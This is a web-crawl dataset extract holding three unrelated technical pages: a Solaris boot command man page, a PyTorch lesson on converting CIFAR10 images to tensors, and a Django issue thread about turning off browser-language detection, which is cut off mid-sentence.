text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
NAME | SYNOPSIS | DESCRIPTION | OPTIONS | IA BOOT SEQUENCE DETAILS | IA Primary Boot | IA Secondary Boot | EXAMPLES | FILES | SEE ALSO | WARNINGS | NOTES filesystems (see vfstab(4)), and runs ufsboot (when booting from a disk), or inetboot . The boot command syntax for specifying the two methods of network booting are: The command: it.. Booting from Disk When booting from disk (or disk-like device), the bootstrapping process consists of two conceptually distinct phases, primary boot and secondary boot. In the primary boot phase, the PROM loads the primary boot block from blocks 1 to 15 of the disk partition selected as the boot device.. If the filename is not given on the command line or otherwise specified, for example, by the boot-file NVRAM variable, boot chooses an appropriate default file to load based on what software is installed on the system, the capabilities of the hardware and firmware, and on a user configurable policy file (see FILES, below). The OpenBoot boot command takes arguments of the following form:The default boot command has no arguments:. It is accepted practice to augment the boot command's policy by modifying the policy file; however, changing boot-file or diag-file may generate unexpected results in certain circumstances. This behavior is found on most OpenBoot 2.x and 3.x based systems. Note that differences may occur on some platforms. On IA based systems, the bootstrapping process consists of two conceptually distinct phases, primary boot and secondary boot. The primary boot is implemented in the BIOS ROM on the system board, and BIOS extensions in ROMs on peripheral boards. It is distinguished by its ability to control the installed peripheral devices and to provide I/O services through software interrupts. It begins the booting process by loading the first physical sector from a floppy disk, hard disk, or CD-ROM, or, if supported by the system or network adapter BIOS, by reading a bootstrap program from a network boot server. The primary boot is implemented in IA real-mode code. The secondary boot is loaded by the primary boot. It is implemented in 32-bit, paged, protected mode code. It also loads and uses peripheral-specific BIOS extensions written in IA real-mode code. The secondary boot is called boot.bin and is capable of reading and booting from a UFS file system on a hard disk or a CD or by way of a LAN using the NFS protocol. The secondary boot is responsible for running the Configuration Assistant program which determines the installed devices in the system (possibly with help from the user). The secondary boot then reads the script in /etc/bootrc, which controls the booting process. This file contains boot interpreter commands, which are defined below, and can be modified to change defaults or to adapt to a specific machine. The standard /etc/bootrc script prompts the user to enter a b character to boot with specified options,).. Name of a standalone program to boot. If a filename is not explicitly specified, either on the boot command line or in the boot-file NVRAM variable, boot chooses an appropriate default filename. On most systems, the default filename is the 32-bit kernel. On systems capable of supporting both the 32-bit and 64-bit kernels, the 64-bit kernel will be chosen in preference to the 32-bit kernel. boot chooses an appropriate default file to boot based on what software is installed on the system, the capabilities of the hardware and firmware, and on a user configurable policy file. The boot program interprets this flag to mean ask me, and so it prompts for the name of the standalone. The '-a' flag is then passed to the standalone program.. Display verbose debugging information. Explicitly specify the default-file. On some systems, boot chooses a dynamic default file, used when none is otherwise specified. This option allows the default-file to be explicitly set and can be useful when booting kadb(1M) since, by default, kadb loads the default-file as exported by the boot program. The boot program passes all boot-flags to file. They are not interpreted by boot. See the kernel(1M) and kadb(1M) manual pages for information about the options available with the default standalone program. The boot program passes all client-program-args to file. They are not interpreted by boot. Name of a standalone program to boot. The default is to boot /platform/platform-name/kernel/unix from the root partition, but you can specify another program on the command line.. The boot program passes all boot-args to file. They are not interpreted by boot. See kernel(1M) and kadb(1M) for information about the options available with the kernel. diskette drive, or, if that fails, from the first hard disk. The processor then jumps to the first byte of the sector image in memory. The first sector on a floppy disk contains the master boot block. The boot block is responsible for loading the image of the boot loader strap.com, which then loads the secondary boot, boot.bin. A similar sequence occurs for CD-ROM, and jumps to its first byte in memory. This completes the standard PC-compatible hard disk boot sequence. An IA FDISK partition for the Solaris software begins with a one-cylinder boot slice, which contains the partition boot program (pboot) in the first sector, the standard Solaris disk label and volume table of contents (VTOC) in the second and third sectors, and the bootblk program in the fourth and subsequent sectors. When the FDISK partition for the Solaris software is the active partition, the master boot program (mboot) reads the partition boot program in the first sector into memory and jumps to it. It in turn reads the bootblk program into memory and jumps to it. Regardless of the type of the active partition, if the drive contains multiple FDISK partitions, the user is given the opportunity to reboot another partition. bootblk or strap.com (depending upon the active partition type) reads boot.bin from the file system in the Solaris root slice and jumps to its first byte in memory. For network booting, you have the choice of the boot floppy or Intel's Preboot eXecution Environment (PXE) standard. When booting from the network using the boot floppy, you can select which network configuration strategy you want by editing the boot properties, changing the setting for net-config-strategy. By default, net-config-strategy is set to rarp. It can have two settings, rarp or dhcp. When booting from the network using PXE, the system or network adapter BIOS uses DHCP to locate a network bootstrap program (NBP) on a boot server and reads it using Trivial File Transfer Protocol (TFTP). The BIOS executes the NBP by jumping to its first byte in memory. The NBP uses DHCP to locate the secondary bootstrap on a boot server, reads it using TFTP, and executes it. The secondary boot, boot.bin, switches the processor to 32-bit, paged, protected mode, and performs some limited machine initialization. It runs the Configuration Assistant program which either auto-boots the system, or presents a list of possible boot devices, depending on the state of the auto-boot? variable (see eeprom(1M)). Disk target devices (including CDROM drives) are expected to contain UFS filesystems. Network devices can be configured to use either DHCP or Reverse Address Resolution Protocol (RARP) and bootparams RPC to discover the machine's IP address and which server will provide the root file system. The root file system is then mounted using NFS. After a successful root mount, boot.bin invokes a command interpreter, which interprets /etc/bootrc. The wide range of hardware that must be supported on IA based systems demands great flexibility in the booting process. This flexibility is achieved in part by making the secondary boot programmable. The secondary boot contains an interpreter that accepts a simple command language similar to those of sh and csh. The primary differences are that pipelines, loops, standard output, and output redirection are not supported. The boot interpreter splits input lines into words separated by blanks and tabs. The metacharacters are dollar sign ($), single-quote ('), double-quote ("), number sign (#), new-line, and backslash (\). The special meaning of metacharacters can be avoided by preceding them with a backslash. A new-line preceded by a backslash is treated as a blank. A number sign introduces a comment, which continues to the next new-line. A string enclosed in a pair of single-quote or double-quote characters forms all or part of a single word. White space and new-line characters within a quoted string become part of the word. Characters within a quoted string can be quoted by preceding them with a backslash character; thus a single-quote character can appear in a single-quoted string by preceding it with a backslash. Two backslashes produce a single backslash, and a new-line preceded by a backslash produces a new-line in the string. The boot maintains a set of variables, each of which has a string value. The first character of a variable name must be a letter, and subsequent characters can be letters, digits, or underscores. The set command creates a variable and/or assigns a value to it, or displays the values of variables. The unset command deletes a variable. Variable substitution is performed when the interpreter encounters a dollar-sign that is not preceded by a backslash. The variable name following the dollar sign is replaced by the value of the variable, and parsing continues at the beginning of the value. Variable substitution is performed in double-quoted strings, but not in single-quoted strings. A variable name can be enclosed in braces to separate it from following characters. A command is a sequence of words terminated by a new-line character. The first word is the name of the command and subsequent words are arguments to the command. All commands are built-in commands. Standalone programs are executed with the run command. Commands can be conditionally executed by surrounding them with the if, elseif, else, and endif commands: The set, if, and elseif commands evaluate arithmetic expressions with the syntax and semantics of the C programming language. The ||, &&, |, ‸, &, ==, !=, <, >, <=, >=, >>, <<, +, -, *, /, %, ~, and ! operators are accepted, as are (, ), and comma. Signed 32-bit integer arithmetic is performed. Expressions are parsed after the full command line has been formed. Each token in an expression must be a separate argument word, so blanks must separate all tokens on the command line. Before an arithmetic operation is performed on an operand word, it is converted from a string to a signed 32-bit integer value. After an optional leading sign, a leading 0 produces octal conversion and a leading 0x or 0X produces hexadecimal conversion. Otherwise, decimal conversion is performed. A string that is not a legal integer is converted to zero. Several built-in functions for string manipulation are provided. Built-in function names begin with a dot. String arguments to these functions are not converted to integers. To cause an operator, for example, -, to be treated as a string, it must be preceded by a backslash, and that backslash must be quoted with another backslash. Also be aware that a null string can produce a blank argument, and thus an expression syntax error. For example: if .strneq ( ${usrarg}X , \- , 1 ) The boot interpreter takes its input from the system console or from one or more files. The source command causes the interpreter to read a file into memory and begin parsing it. The console command causes the interpreter to take its input from the system console. Reaching EOF causes the interpreter to resume parsing the previous input source. CTRL-D entered at the beginning of console line is treated as EOF. The echo command writes its arguments to the display. The read command reads the system console and assigns word values to its argument variables. The verbose command turns verbose mode on and off. In verbose mode, the interpreter displays lines from the current source file and displays the command as actually executed after variable substitution. The singlestep command turns singlestep mode on and off. In singlestep mode, the interpreter displays step ? before processing the next command, and waits for keyboard input, which is discarded. Processing proceeds when ENTER is pressed. This allows slow execution in verbose mode. When the interpreter is first invoked by the boot, it begins execution of a compiled-in initialization string. This string typically consists of "source /etc/bootrc\n" to run the boot script in the root file system. The boot passes information to standalone programs through arguments to the run command. A standalone program can pass information back to the boot by setting a boot interpreter variable using the var_ops() boot service function. It can also pass information to the kernel using the setprop() boot service function. The whoami property is set to the name of the standalone program. Interpret input from the console until CTRL-D. Display the arguments separated by blanks and terminate with a new-line. Display the arguments separated by blanks, but do not terminate with a new-line. Assign the value of property propname to the variable varname. A property value of length zero produces a null string. If the property does not exist, the variable is not set. Assign the length in hexadecimal of the value of property propname to the variable varname. Property value lengths include the terminating null. If the property does not exist, the variable is set to 0xFFFFFFFF (-1). If the expression expr is true, execute instructions to the next elseif, else, or endif. If expr is false, do not execute the instructions. If the preceding if and elseif commands all failed, and expr is true, execute instructions to the next elseif, else, or endif. Otherwise, do not execute the instructions. If the preceding if and elseif commands all failed, execute instructions to the next elseif, else, or endif. Otherwise, do not execute the instructions. Revert to the execution mode of the surrounding block. Display a help screen that contains summaries of all available boot shell commands. Read a line from the console, break it into words, and assign them as values to the variables name1, and so forth. Same as read, but timeout after time seconds. Load and transfer control to the standalone program name, passing it arg1 and further arguments. Display all the current variables and their values. Set the value of the variable name to the null string. Set the value of the variable name to word. Set the value of the variable name to the value of expr. expr must consist of more than one word. The value is encoded in unsigned hexadecimal, so that -1 is represented by 0xFFFFFFFF. Set the text mode display attributes. Allowable colors are black, blue, green, cyan, red, magenta, brown, white, gray, lt_blue, lt_green, lt_cyan, lt_red, lt_magenta, yellow, and hi_white. Set the value of the property propname to word. Turn on singlestep mode, in which the interpreter displays step ? before each command is processed, and waits for keyboard input. Press ENTER to execute the next command. Turn off singlestep mode. Read the file name into memory and begin to interpret it. At EOF, return to the previous source of input. Delete the variable name. Turn on verbose mode, which displays lines from source files and commands to be executed. Turn off verbose mode. The following built-in functions are accepted within expressions: Returns an integer value that is less than, equal to, or greater than zero, as string1 is lexicographically less than, equal to, or greater than string2. Returns an integer value that is less than, equal to, or greater than zero, as string1 is lexicographically less than, equal to, or greater than string2. At most, n characters are compared. Returns true if string1 is equal to string2, and false otherwise. Returns true if string1 is equal to string2, and false otherwise. At most, n characters are compared. Scans n locations in memory starting at addr, looking for the beginning of string. The string in memory need not be null-terminated. Returns true if string is found, and false otherwise. .strfind can be used to search for strings in the ROM BIOS and BIOS extensions that identify different machines and peripheral boards. To boot the default kernel in single-user interactive mode, respond to the ok prompt with one of the following: To boot kadb specifying the 32–bit kernel as the default file: To boot the 32-bit kernel explicitly, the kernel file name should be specified. So, to boot the 32-bit kernel in single-user interactive mode, respond to the ok prompt with one of the following: To boot the 64-bit kernel explicitly, the kernel file name should be specified. So, to boot the 64-bit kernel in single-user interactive mode, respond to the ok prompt with one of the following:Refer to the NOTES section "Booting UltraSPARC Systems" before booting the 64–bit kernel using an explicit filename. To boot the default kernel in single-user interactive mode, respond to the > prompt with one of the following: second level program to boot from a disk or CD. table in which the "initdefault" state is specified. program that brings the system to the "initdefault" state. Primary and alternate pathnames for the boot policy file. Note that the policy file is not implemented on all platforms. default program to boot system. default program to boot system. See NOTES section "Booting UltraSPARC Systems." script that controls the booting process. second level boot program used on) System Administration Guide: Basic Administration). For more information, see the Sun Hardware Platform Guide. Because the ``-'' key on national language keyboards has been moved, an alternate key must be used to supply arguments to the boot command on an IA based system using these keyboards. Use the ``-'' on the numeric keypad. The specific language keyboard and the alternate key to be used in place of the ``-'' during bootup is shown below. Substitute Key ' ' + ? ? For example, b -r would be typed as b +r on Swedish keyboards, although the screen display will show as b -r. NAME | SYNOPSIS | DESCRIPTION | OPTIONS | IA BOOT SEQUENCE DETAILS | IA Primary Boot | IA Secondary Boot | EXAMPLES | FILES | SEE ALSO | WARNINGS | NOTES
http://docs.oracle.com/cd/E19683-01/816-5212/6mbcdgjph/index.html
CC-MAIN-2017-30
refinedweb
3,060
65.12
Convert CIFAR10 Dataset from PIL Images to PyTorch Tensors Convert CIFAR10 Dataset from PIL Images to PyTorch Tensors by Using PyTorch's ToTensor Operation < > Code: Transcript: Once imported, the CIFAR10 dataset will be an array of Python Imaging Library (PIL) images. This is useful for some applications such as displaying the images on the screen. However, in order to use the images in our deep neural network, we will first need to transform them into PyTorch tensors. Conveniently, the ToTensor function in torchvision.transforms is built for exactly this purpose. First, we need to import torch. import torch Then we need to import torchvision. import torchvision Then we need to import torchvision.datasets as datasets. import torchvision.datasets as datasets Then we need to import torchvision.transforms as transforms. import torchvision.transforms as transforms Now, we need to check that our versions of torch and torchvision are current. print(torch.__version__) print(torchvision.__version__) As of March 22, 2018, 0.3.1 for torch and 0.2.0 for torchvision are the current versions. Now, when we are importing our training test sets from torchvision.datasets, instead of leaving it blank, we will want to set the transform parameter to the ToTensor transform. cifar_trainset = datasets.CIFAR10(root='./data', train=True, download=True, transform=transforms.ToTensor()) cifar_testset = datasets.CIFAR10(root='./data', train=False, download=True, transform=transforms.ToTensor()) Specifically, the root, train, and download parameters were covered in the previous video. The transform parameter specifies how we want to transform the imported images and the transform parameter indicates that we want the images to be converted to PyTorch tensors during import. We are now free to use the tensors in a PyTorch model.
https://aiworkbox.com/lessons/convert-cifar10-dataset-from-pil-images-to-pytorch-tensors
CC-MAIN-2019-51
refinedweb
282
60.31
Important: Please read the Qt Code of Conduct - moc cpp generation fails with "No relevant classes found. No output generated." I have a class D11 that inherits from class B1 that inherits QObject. B1 has declared Q_OBJECT, and so does D11. (Well, D11 tries to). But I'm running into the infamous 'undefined reference to vtable'error in the constructor and destructor of D11. This issue has popped up many times before on these forums, and I have tried all the usual recommendations: - The failing class is indeed in separate files (D11.h and D11.cpp). - I have tried Build > Run qmake from QtCreator. - Deleted the build dir, run qmake from QtCreator, and run build again. The moc build step to generate moc_D11.cpp results in the following: D11.h:0: Note: No relevant classes found. No output generated. and indeed, moc_D11.cpp is an empty file. I have many other files in my project with the exact same hierarchies: QObject <-- B1 <-- D11 QObject <-- B1 <-- D12 QObject <-- B1 <-- D13 QObject <-- B2 <-- D21 None of these have any problems. In particular, D12 and D13 that derive from B1 and are (obviously) fairly similar to D11 are fine and have their moc_D12.cpp and moc_D13.cpp generated just fine. This is being cross-compiled to an RPi, but not sure that that should matter. The moc command is fairly long, but I have checked it meticulously, switch-by-switch, between the versions that work (D12, D13) vs D11, which doesn't work. Unfortunately the project is both large as well as proprietary, so I cannot post it - and of course a toy example is not going to show this (and/or would be easy to resolve). Still, if there is anything else I can try, I will welcome suggestions. - jsulm Lifetime Qt Champion last edited by Not sure if it will help, but here is an obfuscated version. D11.h: #ifndef D11_H #define D11_H #include "b1.h" class B2; class D11 : public B1 { Q_OBJECT // <-- this is causing "undefined reference to vtable for D11" WHY!?? public: D11(const B2& s); ~D11() override; void processRawData(const QByteArray& etba) override; protected: void initFSMs() override; void setLock(byte prefix) override; void dropLock() override; void updateFsm1(byte prefix) override; void updateFsm2(byte prefix) override; bool updateFsm3(byte dataByte) override; bool extractVals(byte dataByte) override; void signExtend(int& val) override; signals: void signal1(); void signal2(); private: const int CONST1 = 0b1000'0000; const int CONST2 = 0b0100'0000; const int MASK = 0b0010'0000; // About 15-20 int and bool private members here... enum class Fsm1State { ...names here... }; enum class Fsm2State { ...names here... }; enum class Fsm3State { ...names here... }; Fsm1State mFsm1State; Fsm2State mFsm2State; Fsm3State mFsm3State; bool fn1(byte dataByte); bool fn2(byte dataByte); bool fn3(byte dataByte); bool fn4(byte dataByte); }; #endif // D11_H D11.cpp: #include "d11.h" #include "B2dir/b2.h" D11::D11(const B2& s) : B1(s) { initFSMs(); } D11::~D11() { qDebug("D11 dtor"); } void D11::initFSMs() { mFsm1State = Fsm1State::NAME1; mFsm2State = Fsm2State::NAME1; } void D11::processRawData(const QByteArray &etba) { for (byte dataByte : etba) { . . . } emit mBase2.b2signal(); } // Other vanilla member function definitions here... B1.h: #ifndef B1_H #define B1_H #include <QObject> ...other QIncludes here, like QByteArray etc... class B2; class B1 : public QObject { Q_OBJECT public: explicit B1(const B2& s, QObject *parent = nullptr); virtual ~B1(); using byte = unsigned char; signals: public slots: public: virtual void processRawData(const QByteArray& etba) = 0; protected: // some int/bool members here const B2& mBase2; virtual void initFSMs() = 0; virtual void setLock(byte dataByte) = 0; virtual void dropLock() = 0; virtual void updateFsm1(byte dataByte) = 0; virtual void updateFsm2(byte dataByte) = 0; virtual bool updateFsm3(byte dataByte) = 0; virtual bool extractVals(byte dataByte) = 0; virtual void signExtend(int& val) = 0; }; #endif // B1_H B1.cpp: #include "b1.h" #include "B2dir/b2.h" B1::B1(const B2& s, QObject *parent) : QObject(parent), mBase2(s) { qDebug("B1 abstract base class ctor"); } B1::~B1() { qDebug("B1 abstract base class dtor"); } I'm happy to provide any specific additional information. I can comment out the Q_OBJECTin D11 and of course it builds just fine. Hi, Did you re-run qmake after adding the Q_OBJECT macro ? @sgaist yes, see my first post. In particular, I have tried deleting the build directory, rerunning qmake and rerunning the entire build after that. Is there a verbose mode to the moc command that will elaborate on the No relevant classes found? Quite incredibly, it turned out that the moc error was because of moc parsing not being able to comprehend C++14 digit separators in the constants I had in the private section of my class! Removing the digit separators enabled the moc compilation to go through without errors! So this doesn't work: private: const int CONST1 = 0b1000'0000; This works: private: const int CONST1 = 0b10000000; I have found C++14 digit separator support to be abysmal within the Qt ecosystem, from Qt Creator to now moc. I will personally just stop using it till Qt 6 at least; hopefully it will improve by then :P Opening a feature request will be a better idea, it will make the issue known to moc's developers. - aha_1980 Lifetime Qt Champion last edited by Please post a link to the report here too, so others can follow later. Thanks! Remove (no clean) build directory and build project. @SGaist @aha_1980 Bug report here: I also found other bugs filed against moc that one would need to watch out for: - moc does not support raw string literals: - moc does not support (certain?) unicode files: These will also result in the No relevant classes founderror. Thanks for sharing your additional findings !
https://forum.qt.io/topic/105770/moc-cpp-generation-fails-with-no-relevant-classes-found-no-output-generated
CC-MAIN-2021-04
refinedweb
929
64.51
Why we need Generics? Generics in java is a concept which allows the users to choose the reference type that a method, constructor of a class accepts. By the usage of generics, we can enable a class interface and method accepts all types as parameters. Please check out the below example: Class Generics { Integer work; Generics(Integer work){ this.work=work; } public void display() { system.out.println(“Working hours: “this.work); } } public class GenericsMain { public static void main (String args[] ) { Generics generic=new Generics(10); generic.display(); } } Generic class A class is generic if it declares one or more type variables. In the example we are using the E type parameter to create the generic class of specific type. Class Worker { E obg; Void add (E obg){ this.obg=obg;} E get(){return obg;} } Generic Interfaces A generic interface has a name and a formal type parameter E. The other parts of the interface use E as they would use an actual type e.g String Public interface Worker { void move(E e, String code); E getTerm(); String getMove(); } Generic Methods and Constructors Constructors can also be generic. Even non-generic class can have generic constructors. Also constructors are like methods but without return types. Class WorkerClass { Public NonGenericClass(E tm) {. E tmp=tm; System.out.println(tmp); } } Public class Generic { Public static void main(String[] args) Worker wr1. = new WorkerClass(10) Worker wr2 = new.WorkerClass(“ed”) Worker wr3 =. New WorkerClass(3.2) } } Bounded Types Bounded types are introduced in generics. Using generics types, you can make the objects of generic class to have data of specific derived types. Class Worker {. E wr; public Worker(E tm) { this.tm=tm; } Public E getE() { Return tm } } Wildcard Arguments Wildcards is a mechanism in Java aimed for making it possible to cast a collection of a certain class, e.g E, to a collection of a subclass or superclass of E. Static boolean Worker(List tm) { Return tm.add(remove(0)); } Generics and Their Inheritance Inheritance is an OOP’s concept and generics are a CLR feature that allows you specify type parameters at compile-time for types that expose them. Inheritance allows me to create one type: Class Name{} And then later create another type that extends Pen Class FullName: Name{} Type Erasure Type erasure is a process where generic parameters are replaced by actual class or method by compiler. In type erasure, compiler gives surity that no extra classes are created and there is no runtime overhead. Class Worker { E tmp; Worker (W wr) { Tmp=wr; } E get() { Return tmp; } } After compile the is replaced like below: Class Worker { String tmp; Worker (String wr) { Tmp=wr; } String get() { return tmp; } }
https://codingsmania.in/generics-in-java/
CC-MAIN-2021-25
refinedweb
450
57.57
In a very real sense, SAX reports tags, not elements. When the parser encounters a start-tag, it calls the startElement() method. When the parser encounters an end-tag, it calls the endElement() method. When the parser encounters an empty-element tag, it calls the startElement() method and then the endElement() method. If an end-tag does not match its corresponding start-tag, then the parser throws a SAXParseException. Beyond that, however, you are responsible for tracking the hierarchy. For example, if you want to treat a params element inside a methodCall element differently from a params element inside a fault element, then you’ll need to store some form of state in-between calls to the startElement() and endElement() methods. This is actually quite common. Many SAX content handlers simply build up a data structure as the document is parsed, and then operate on that data structure once the document has been completely read. Provided the data structure is simpler than the XML document itself, this is a reasonable approach. However in the most general case you can find yourself inventing a complete object hierarchy to represent arbitrary XML documents. In this case, you’re better off using DOM or JDOM instead of SAX, since they’ll do the hard work of defining and building this object hierarchy for you. The arguments to the startElement() and endElement() methods are similar: public void startElement(String namespaceURI, String localName, String qualifiedName, Attributes atts) throws SAXException; public void endElement(String namespaceURI, String localName, String qualifiedName) throws SAXException; First the namespace URI is passed as a String. If the element is unqualified (i.e. it is not in a namespace), then this argument is the empty string, not null. Next the local name is passed as a String. This is the part of the name after the prefix and the colon, if any. For instance, if an element is named SOAP-ENV:Body, then its local name is Body. However, if an element is named Body with no prefix, then its local name is still Body. The third argument contains the qualified name as a String. This is the entire element name including the prefix and the colon, if any. For instance, if an element is named SOAP-ENV:Body, then its qualified name is SOAP-ENV:Body. However, if an element is named Body with no prefix, then its qualified name is just Body. Finally in the startElement() method only, the set of attributes for that element is passed as a SAX-specific Attributes object. I’ll discuss this in the next section. As an example I’m going to build a GUI representation of the tree structure of an XML document that allows you to collapse and expand the individual elements. The GUI parts will be provided by a javax.swing.JTree. The tree will be filled in startElement() and displayed in a window in endDocument(). Example 6.7 shows how. Example 6.7. A ContentHandler class that builds a GUI representation of an XML document import org.xml.sax.*; import org.xml.sax.helpers.*; import javax.swing.*; import javax.swing.tree.*; import java.util.*; public class TreeViewer extends DefaultHandler { private Stack nodes; // Initialize the per-document data structures public void startDocument() throws SAXException { // The stack needs to be reinitialized for each document // because an exception might have interrupted parsing of a // previous document, leaving an unempty stack. nodes = new Stack(); } // Make sure we always have the root element private TreeNode root; // Initialize the per-element data structures public void startElement(String namespaceURI, String localName, String qualifiedName, Attributes atts) { String data; if (namespaceURI.equals("")) data = localName; else { data = '{' + namespaceURI + "} " + qualifiedName; } MutableTreeNode node = new DefaultMutableTreeNode(data); try { MutableTreeNode parent = (MutableTreeNode) nodes.peek(); parent.insert(node, parent.getChildCount()); } catch (EmptyStackException e) { root = node; } nodes.push(node); } public void endElement(String namespaceURI, String localName, String qualifiedName) { nodes.pop(); } // Flush and commit the per-document data structures public void endDocument() { JTree tree = new JTree(root); JScrollPane treeView = new JScrollPane(tree); JFrame f = new JFrame("XML Tree"); f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); f.getContentPane().add(treeView); f.pack(); f.show(); } public static void main(String[] args) { try { XMLReader parser = XMLReaderFactory.createXMLReader( "org.apache.xerces.parsers.SAXParser" ); ContentHandler handler = new TreeViewer(); parser.setContentHandler(handler); for (int i = 0; i < args.length; i++) { parser.parse(args[i]); } } catch (Exception e) { System.err.println(e); } } // end main() } // end TreeViewer The JTree class provides a ready-made data structure for this program. All we have to do is fill it. However, it’s also necessary to track where we are in the XML hierarchy at all times so that the parent to which the current node will be added is accessible. For this purpose a stack is very helpful. The parent element can be pushed onto the stack in startElement() and popped off the stack in endElement(). Since SAX’s beginning-to-end parsing of an XML document equates to a depth-first tree traversal, the top element in the stack always contains the most recently visited element. I find stacks like this to be very useful in many SAX programs. More complex programs may need to build more complicated tree or object structures. If your purpose is not simply to display a GUI for the tree, then you should probably roll your own tree structure rather than using JTree as I’ve done here. TreeViewer runs with the default distribution of Java 1.2 or later. It can run with Java 1.1, but you’ll need to make sure the swingall.jar archive is somewhere in your class path. The javax.swing classes used here are not bundled with the JDK 1.1. Figure 6.1 shows this program displaying Example 1.7 from Chapter 1. Swing allows individual parts of the tree to be collapsed or expanded; but the entire element tree is always present even if it’s hidden. JTree also allows you to customize the icons used, and even enable the user to edit the tree. However, since that’s purely Swing programming and says little to nothing about XML, I leave that as an exercise for the reader. This makes a nice little example, but please don’t treat it as more than that. The tantalizing easiness of representing XML documents with widgets like java.swing.JTree and similar things in Windows, Motif, and other GUIs has spawned a lot of editors and browsers that use these tree models as user interfaces. However, not a lot of thought went into whether users actually thought of XML documents this way or could be quickly trained to do so. In actual practice, user interfaces of this sort have failed spectacularly. A good user interface for XML editors and viewers looks a lot more like the user interfaces people are accustomed to from traditional programs such as Microsoft Word, Netscape Navigator, and Adobe Illustrator. The whole point of a GUI is that it can decouple the user interface from the underlying data model. Just because an XML document is a tree is no excuse for making users edit trees when they don’t want to.
http://www.cafeconleche.org/books/xmljava/chapters/ch06s05.html
crawl-002
refinedweb
1,187
55.44
28 September 2012 10:22 [Source: ICIS news] SINGAPORE (ICIS)--China’s linear low density polyethylene (LLDPE) futures continued to inch up on Friday on the back of rising crude prices, but the weakness in the global economy still weighed on market sentiment, industry sources said. January LLDPE futures, the most actively traded contract on the Dalian Commodity Exchange (DCE), closed at yuan (CNY) 10,625/tonne ($1,687/tonne), up by 0.33% or CNY35/tonne from Thursday’s settlement price of CNY10,590/tonne. Around 441,435 tonnes of LLDPE or 176,574 contracts for delivery in January 2013 were traded on Friday, according to DCE data. At 17:17 ?xml:namespace> ($1 = CNY6
http://www.icis.com/Articles/2012/09/28/9599407/china-lldpe-futures-rise-0.33-on-firmer-crude-prices.html
CC-MAIN-2013-48
refinedweb
116
51.18
Opened 6 years ago Closed 6 years ago Last modified 6 years ago #15168 closed (wontfix) feature request - New setting Description My request: Please add another settings option like: DISCOVER_LANGUAGE, which is set to True by default. My problem: I have site in 5 languages (et, en, ru, lv, lt), default language is set to 'et'. My browser (like 75% browsers used by estonians) is in english though. For that reason django sets default language to 'en' when i visit my site for the first time. Many people in small countries use browsets which have english as their default language. Reason behind this is that the programs have either not been translated to english or the translation or vocabulary used are horrible. You cant expect all those people to know that they should go and set their browser accept language to something other than en-us. My solution: create setting option which allows us to turn off that accept headers based language detection. For now im forced to comment that part of the code out, cause estonians simply want to see their damn pages in estonian:P Alan. Change History (8) comment:1 Changed 6 years ago by comment:2 Changed 6 years ago by Look- I need the middleware. The middleware works just fine. Its just this one specific piece of code in django.utils.translation.trans_real get_language_from_request that does not provide the desired results. Like i explained in Original Post, language discovery, based on accept headers shows pages in undesired language on first visit. For that reason forementioned method looks like that in my django install, right now: def get_language_from_request(request): """ Analyzes the request to find what language the user wants the system to show. Only languages listed in settings.LANGUAGES are taken into account. If the user requests a sublanguage where we have a main language, we send out the main language. """ global _accepted from django.conf import settings globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale') supported = dict(settings.LANGUAGES) if hasattr(request, 'session'): lang_code = request.session.get('django_language', None) if lang_code in supported and lang_code is not None and check_for_language(lang_code): return lang_code lang_code = request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME) if lang_code and lang_code not in supported: lang_code = lang_code.split('-')[0] # e.g. if fr-ca is not supported fallback to fr if lang_code and lang_code in supported and check_for_language(lang_code): return lang_code ''' accept = request.META.get('HTTP_ACCEPT_LANGUAGE', '') for accept_lang, unused in parse_accept_lang_header(accept): if accept_lang == '*': break # We have a very restricted form for our language files (no encoding # specifier, since they all must be UTF-8 and only one possible # language each time. So we avoid the overhead of gettext.find() and # work out the MO file manually. # 'normalized' is the root name of the locale in POSIX format (which is # the format used for the directories holding the MO files). normalized = locale.locale_alias.get(to_locale(accept_lang, True)) if not normalized: continue # Remove the default encoding from locale_alias. normalized = normalized.split('.')[0] if normalized in _accepted: # We've seen this locale before and have an MO file for it, so no # need to check again. return _accepted[normalized] for lang, dirname in ((accept_lang, normalized), (accept_lang.split('-')[0], normalized.split('_')[0])): if lang.lower() not in supported: continue langfile = os.path.join(globalpath, dirname, 'LC_MESSAGES', 'django.mo') if os.path.exists(langfile): _accepted[normalized] = lang return lang ''' return settings.LANGUAGE_CODE I would need to comment that part of code out from each new django version without that setting. With setting check, if i want to use that accept headers based lang discovery, commenting out would be unnecessary. Did that make it clearer? Why would i want or need to write whole new languagemiddleware if all i need is one method out of the way? Thanks, Alan. comment:3 Changed 6 years ago by comment:4 Changed 6 years ago by I think the behaviour you are after is really specific and should not be included; you are basically saying "I want to ignore this 1 language when it is not set in a cookie". Removing Accept-Language headers would mean first time visitors which have set it to Russian for example would get Estonian, which is probably also not ideal. In your case I would extend the LocaleMiddleware to mirror that; check the HTTP_ACCEPT_LANGUAGE in META before handing it to the LocaleMiddleware-superclass and rewrite English to Estonian (META is mutable iirc). comment:5 Changed 6 years ago by Please don't reopen tickets marked as "won't fix" by core developers without prior discussion on django-developers mailing list. As for the ticket itself, the middleware does exactly what I would except, both as a programmer and a user. I have my browser set to 'en-US' locale, because I prefer so (although I'm a polish speaking person). Without the detection, I would get your site in Estonian, which is probably jibberish to me. Also, your need seems very specific, so I don't think it mandates a settings. You can make your own middleware based on the one in core. comment:6 follow-up: 7 Changed 6 years ago by You see things from your point of view, so lets give it one more shot: 1) Browsers/Op systems are not available in many small languages and therefore the speakers of languages like estonians have to use browsers/systems in english and their browsers are therefore in english - they may not desire it. 2) Those users do not know how to change their browsers language - you got to know that you and are are HUGE minority - perhaps only 5% of users know that they CAN change their browser language. Even less people know how and want to change it. 3) those 95% of people who dont know that they CAN change their browser language or know how to, usually visit pages, which are in their own language (the language that they speak every day, not the language their browser is set to). 4) I want to make pages that can be seen in default language - the language that the target audience of the page uses.. "Without the detection, I would get your site in Estonian, which is probably jibberish to me."(quoting lrekucki). Well in such cases - You are not the target audience. Ask your parents or grandparents, if they know what browser accept headers or if they can change those. This probably is irrelevant if they come from english speaking (or other countries which's languages are spoken by millions and millions of people) countries, since they never need to do anything like this anyway. Parents & grandparents in countries like Estonia, Latvia, Lithuania and so on, dont know about the accept headers or such either. But in most cases, their browsers are in english and they dont even know that this could be a problem. Now we are making the websites 